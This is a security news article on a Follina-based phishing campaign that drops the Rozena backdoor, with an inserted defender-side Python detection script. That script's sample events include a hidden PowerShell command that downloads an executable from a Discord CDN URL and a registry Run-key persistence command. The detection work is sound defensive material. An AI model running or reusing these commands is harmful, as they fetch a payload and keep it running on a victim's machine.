A newly observed phishing campaign is leveraging the recently disclosed Follina security vulnerability to distribute a previously undocumented backdoor on Windows systems.
“Rozena is a backdoor malware that is capable of injecting a remote shell connection back to the attacker's machine,” Fortinet FortiGuard Labs researcher Cara Lin said in a report this week.
Tracked as CVE-2022-30190, the now-patched Microsoft Windows Support Diagnostic Tool (MSDT) remote code execution vulnerability has come under heavy exploitation in recent weeks ever since it came to light in late May 2022.
The starting point for the latest attack chain observed by Fortinet is a weaponized Office document that, when opened, connects to a Discord CDN URL to retrieve an HTML file (“index.htm”) that, in turn, invokes the diagnostic utility using a PowerShell command to download next-stage payloads from the same CDN attachments location.
This includes the Rozena implant (“Word.exe”) and a batch file (“cd.bat”) that is designed to terminate MSDT processes, establish the backdoor's persistence by means of a Windows Registry modification, and download a harmless Word document as a decoy.
The malware's core function is to inject shellcode that launches a reverse shell to the attacker's host (“microsofto.duckdns[.]org”), ultimately allowing the attacker to take control of the system as needed to monitor and capture information, while also maintaining a backdoor into the compromised system.
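A defender-side illustration of the chain just described, added here and not part of the Fortinet report or this article: the constructed Sysmon-style process-creation events below model Word spawning msdt.exe, a PowerShell download from the Discord CDN, and the batch file killing MSDT and writing a Run key, and the detection logic flags each stage by walking process ancestry back to an Office parent. The cdn.discordapp.com host, the taskkill command and the HKCU Run key are assumptions; the text only says "Discord CDN", "terminate MSDT processes" and "Windows Registry modification".

```python
import re

# Constructed process-creation events (Sysmon Event ID 1 style) modelled on the
# Word -> msdt.exe -> PowerShell -> Discord CDN -> cd.bat chain described above.
# Every PID, path and command line here is made up for illustration.
EVENTS = [
    {"pid": 4100, "ppid": 900,  "image": "WINWORD.EXE", "cmd": "WINWORD.EXE /n quote.docx"},
    {"pid": 4120, "ppid": 4100, "image": "msdt.exe",    "cmd": "msdt.exe (arguments omitted)"},
    {"pid": 4130, "ppid": 4120, "image": "powershell.exe",
     "cmd": "powershell.exe -w hidden iwr https://cdn.discordapp.com/attachments/1234/5678/Word.exe "
            "-OutFile C:\\Users\\Public\\Word.exe"},
    {"pid": 4140, "ppid": 4130, "image": "cmd.exe",      "cmd": "cmd.exe /c C:\\Users\\Public\\cd.bat"},
    {"pid": 4150, "ppid": 4140, "image": "taskkill.exe", "cmd": "taskkill /f /im msdt.exe"},
    {"pid": 4160, "ppid": 4140, "image": "reg.exe",      # assumed Run-key persistence location
     "cmd": "reg add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v Word "
            "/d C:\\Users\\Public\\Word.exe"},
    {"pid": 5000, "ppid": 900,  "image": "EXCEL.EXE",    "cmd": "EXCEL.EXE budget.xlsx"},   # benign
    {"pid": 5010, "ppid": 5000, "image": "splwow64.exe", "cmd": "splwow64.exe"},            # benign
]

OFFICE = {"WINWORD.EXE", "EXCEL.EXE", "POWERPNT.EXE", "OUTLOOK.EXE"}
DISCORD_CDN = re.compile(r"https?://cdn\.discordapp\.com/attachments/", re.I)  # assumed host
RUN_KEY = re.compile(r"\\CurrentVersion\\Run\b", re.I)

def ancestors(events, pid):
    """Return the image names from `pid` up to the root of the recorded tree."""
    by_pid = {e["pid"]: e for e in events}
    chain = []
    while pid in by_pid:
        chain.append(by_pid[pid]["image"].upper())
        pid = by_pid[pid]["ppid"]
    return chain

def detect(events):
    """Flag each stage of the chain; returns (rule, pid) tuples in event order."""
    alerts = []
    for e in events:
        img = e["image"].upper()
        office_lineage = bool(OFFICE & set(ancestors(events, e["ppid"])))
        if img == "MSDT.EXE" and office_lineage:              # Follina trigger
            alerts.append(("office_spawned_msdt", e["pid"]))
        if DISCORD_CDN.search(e["cmd"]) and office_lineage:   # payload staging
            alerts.append(("office_descendant_fetches_discord_cdn", e["pid"]))
        if img == "TASKKILL.EXE" and "msdt" in e["cmd"].lower():  # cd.bat cleanup
            alerts.append(("msdt_killed_by_script", e["pid"]))
        if img == "REG.EXE" and RUN_KEY.search(e["cmd"]) and office_lineage:
            alerts.append(("run_key_persistence_from_office_chain", e["pid"]))
    return alerts

if __name__ == "__main__":
    for rule, pid in detect(EVENTS):
        print(f"{rule}: pid {pid}")
```

Matching on ancestry rather than the immediate parent keeps the rules working when the attacker inserts extra cmd.exe or PowerShell hops between Office and the stage being detected.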
The exploitation of the Follina flaw to distribute malware through malicious Word documents comes as social engineering attacks are relying on Microsoft Excel, Windows shortcut (LNK), and ISO image files as droppers to deploy malware such as Emotet, QBot, IcedID, and Bumblebee to a victim's device.
The droppers are said to be distributed through emails that contain either the dropper itself or a password-protected ZIP as an attachment, an HTML file that extracts the dropper when opened, or a link to download the dropper in the body of the email.
While attacks observed in early April prominently featured Excel files with XLM macros, Microsoft's decision to block macros by default around the same time is said to have forced the threat actors to pivot to other methods like HTML smuggling as well as .LNK and .ISO files.
Last month, Cyble disclosed details of a malware tool called Quantum that is being sold on underground forums in order to equip cybercriminal actors with the capability to build malicious .LNK and .ISO files.
It is worth noting that macros have been a tried-and-tested attack vector for adversaries looking to drop ransomware and other malware on Windows systems, whether through phishing emails or other means.
Microsoft has since temporarily paused its plans to disable Office macros in files downloaded from the internet, with the company telling The Hacker News that it is taking the time to make “additional changes to enhance usability.”